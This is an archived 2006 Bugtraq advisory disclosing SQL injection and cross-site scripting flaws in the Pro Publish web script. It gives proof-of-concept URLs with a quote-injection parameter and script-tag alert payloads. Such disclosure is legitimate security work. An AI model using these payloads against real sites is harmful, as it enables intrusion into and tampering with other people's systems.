| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 2 Jun 2006 17:25:40 -0000 From: Soothackers@...il.com To: bugtraq@...urityfocus.com Subject: Pro Publish SQL Injection and XSS Vulnerabilities --------------------------------------------- Pro Publish SQL Injection and XSS Vulnerabilities --------------------------------------------- Site: http://www.deltascripts.com/download/ Bug: 1. SQL Injection : http://victim/propublish/cat.php?catid=' 2. XSS : 1- http://victim/propublish/art.php?artid="><script>alert(/Soot/)</script> 2- http://victim/propublish/cat.php?catname="><script>alert(/Soot/)</script> --------------------------------------------- Source : http://soot.shabgard.org/bugs/propublish.txt Credit : Soot Shabgard Security Team http://www.shabgard.org Greetz : Hregy,Elite,Bl2k,Littlehacker,Sasan_4shir ---------------------------------------------
Powered by blists - more mailing lists